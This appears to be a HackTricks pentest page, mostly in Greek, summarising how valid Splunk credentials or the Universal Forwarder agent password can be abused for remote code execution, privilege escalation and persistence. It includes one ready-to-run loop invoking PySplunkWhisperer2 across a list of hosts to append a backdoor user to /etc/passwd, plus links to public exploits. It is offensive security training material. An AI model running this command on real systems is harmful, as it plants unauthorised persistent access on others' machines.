Splunk LPE and Persistence

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Αν αριθμείτε μια μηχανή εσωτερικά ή εξωτερικά και βρείτε το Splunk να τρέχει (θύρα 8090), αν τυχαίνει να γνωρίζετε οποιαδήποτε έγκυρα διαπιστευτήρια μπορείτε να καταχραστείτε την υπηρεσία Splunk για να εκτελέσετε ένα shell ως ο χρήστης που τρέχει το Splunk. Αν το τρέχει ο root, μπορείτε να αναβαθμίσετε τα δικαιώματα σε root.

Επίσης, αν είστε ήδη root και η υπηρεσία Splunk δεν ακούει μόνο σε localhost, μπορείτε να κλέψετε το αρχείο κωδικών από την υπηρεσία Splunk και να σπάσετε τους κωδικούς, ή να προσθέσετε νέα διαπιστευτήρια σε αυτό. Και να διατηρήσετε την επιμονή στον host.

Στην πρώτη εικόνα παρακάτω μπορείτε να δείτε πώς φαίνεται μια σελίδα web του Splunkd.

Splunk Universal Forwarder Agent Exploit Summary

Για περισσότερες λεπτομέρειες ελέγξτε την ανάρτηση https://eapolsniper.github.io/2020/08/14/Abusing-Splunk-Forwarders-For-RCE-And-Persistence/. Αυτό είναι απλώς μια σύνοψη:

Exploit Overview: Μια εκμετάλλευση που στοχεύει τον Splunk Universal Forwarder Agent (UF) επιτρέπει στους επιτιθέμενους με τον κωδικό του agent να εκτελούν αυθαίρετο κώδικα σε συστήματα που τρέχουν τον agent, ενδεχομένως να διακυβεύσουν ολόκληρο το δίκτυο.

Key Points:

Ο agent UF δεν επικυρώνει τις εισερχόμενες συνδέσεις ή την αυθεντικότητα του κώδικα, καθιστώντας τον ευάλωτο σε μη εξουσιοδοτημένη εκτέλεση κώδικα.
Κοινές μέθοδοι απόκτησης κωδικών περιλαμβάνουν την εύρεση τους σε καταλόγους δικτύου, κοινές χρήσεις αρχείων ή εσωτερική τεκμηρίωση.
Η επιτυχής εκμετάλλευση μπορεί να οδηγήσει σε πρόσβαση σε επίπεδο SYSTEM ή root σε διακυβευμένους hosts, εξαγωγή δεδομένων και περαιτέρω διείσδυση στο δίκτυο.

Exploit Execution:

Ο επιτιθέμενος αποκτά τον κωδικό του agent UF.
Χρησιμοποιεί το API του Splunk για να στείλει εντολές ή scripts στους agents.
Πιθανές ενέργειες περιλαμβάνουν εξαγωγή αρχείων, χειρισμό λογαριασμών χρηστών και διακυβέρνηση συστήματος.

Impact:

Πλήρης διακυβέρνηση του δικτύου με δικαιώματα SYSTEM/root σε κάθε host.
Πιθανότητα απενεργοποίησης της καταγραφής για να αποφευχθεί η ανίχνευση.
Εγκατάσταση backdoors ή ransomware.

Example Command for Exploitation:

for i in `cat ip.txt`; do python PySplunkWhisperer2_remote.py --host $i --port 8089 --username admin --password "12345678" --payload "echo 'attacker007:x:1003:1003::/home/:/bin/bash' >> /etc/passwd" --lhost 192.168.42.51;done

Χρήσιμα δημόσια exploits:

https://github.com/cnotin/SplunkWhisperer2/tree/master/PySplunkWhisperer2
https://www.exploit-db.com/exploits/46238
https://www.exploit-db.com/exploits/46487

Κατάχρηση Ερωτημάτων Splunk

Για περισσότερες λεπτομέρειες ελέγξτε την ανάρτηση https://blog.hrncirik.net/cve-2023-46214-analysis

Μάθετε & εξασκηθείτε στο AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Μάθετε & εξασκηθείτε στο GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Υποστήριξη HackTricks

Ελέγξτε τα σχέδια συνδρομής!
Εγγραφείτε στην 💬 ομάδα Discord ή στην ομάδα telegram ή ακολουθήστε μας στο Twitter 🐦 @hacktricks_live.
Μοιραστείτε κόλπα hacking υποβάλλοντας PRs στα HackTricks και HackTricks Cloud github repos.

PreviousSocket Command Injection NextSSH Forward Agent exploitation

Last updated 1 month ago